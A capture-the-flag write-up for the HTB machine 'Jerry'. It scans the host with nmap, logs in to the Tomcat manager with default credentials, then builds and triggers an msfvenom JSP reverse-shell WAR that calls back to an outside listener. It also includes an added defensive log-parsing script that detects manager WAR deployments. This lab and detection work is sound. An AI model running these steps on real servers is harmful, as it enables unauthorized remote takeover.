Jerry
Write-up for the HTB machine 'Jerry'
1. Initial recon
1.1. nmap
nmap -sC -sV 10.10.10.95 -Pn
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
From the nmap scan we can navigate to 10.10.10.95:8080.
Clicking on the manager page, we are prompted to enter some credentials. Trying the usual:
admin:admin
admin:password
...
we are met with a 403 page that contains some default credentials:
tomcat:s3cret
Sure enough, those work when we are prompted to log in again.
2. RCE
Looking through the manager portal at /manager/html, we can see that there is an option to upload WAR files. We can find an msfvenom reverse shell command for a WAR file on HackTricks:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=80 -f war -o revshell.war
After uploading the file for the reverse shell and starting a netcat listener, we can navigate to /revshell on the web server to catch it.
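Seen from the defender's side, the steps above (denied manager logins, a successful login, a WAR upload, then the first request to a brand-new context) all land in the Tomcat access log. The Python script below is an added example, not part of the original write-up; it assumes the AccessLogValve "common" pattern, and the log lines and client addresses are constructed.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b (assumed format)
LINE = re.compile(r'(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample log; addresses are documentation ranges, not from the write-up.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 11398
198.51.100.7 - - [10/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2536
198.51.100.7 - admin [10/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 403 3446
198.51.100.7 - tomcat [10/Jan/2024:10:00:20 +0000] "GET /manager/html HTTP/1.1" 200 17500
198.51.100.7 - tomcat [10/Jan/2024:10:01:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=CONSTRUCTED HTTP/1.1" 200 19000
198.51.100.7 - - [10/Jan/2024:10:01:30 +0000] "GET /revshell/ HTTP/1.1" 200 0
203.0.113.9 - - [10/Jan/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 19367
"""

def context(path):
    """First path segment, i.e. the Tomcat context the request was routed to."""
    return "/" + path.split("?")[0].lstrip("/").split("/")[0]

def find_manager_deploys(log_text):
    """Flag clients that upload a WAR via the manager and then hit an unseen context."""
    seen = set()                # contexts requested so far by anyone
    denied = defaultdict(int)   # client -> 401/403 responses on /manager
    uploads = {}                # client -> authenticated user of the upload
    findings = []
    for m in map(LINE.match, log_text.splitlines()):
        if not m:
            continue            # skip lines that do not fit the assumed pattern
        host, user, method, path, status = m.groups()
        ctx = context(path)
        if ctx == "/manager" and status in ("401", "403"):
            denied[host] += 1
        elif method == "POST" and path.startswith("/manager/html/upload") and status == "200":
            uploads[host] = user
        elif host in uploads and ctx not in seen and status != "404":
            findings.append({"client": host, "user": uploads[host],
                             "denied_before": denied[host], "new_context": ctx})
        seen.add(ctx)
    return findings

if __name__ == "__main__":
    for finding in find_manager_deploys(SAMPLE_LOG):
        print(finding)
```

The access log does not record the uploaded WAR's name, so the script infers the deployment from the first request to a context that was never seen before the upload.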
3. user and root!
A simple whoami in our reverse shell reveals that we are already nt authority\system, so let's just search for our flags.
We can find them at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
and simply running type "2 for the price of 1.txt"
in the flag directory will reveal both our user and root flags.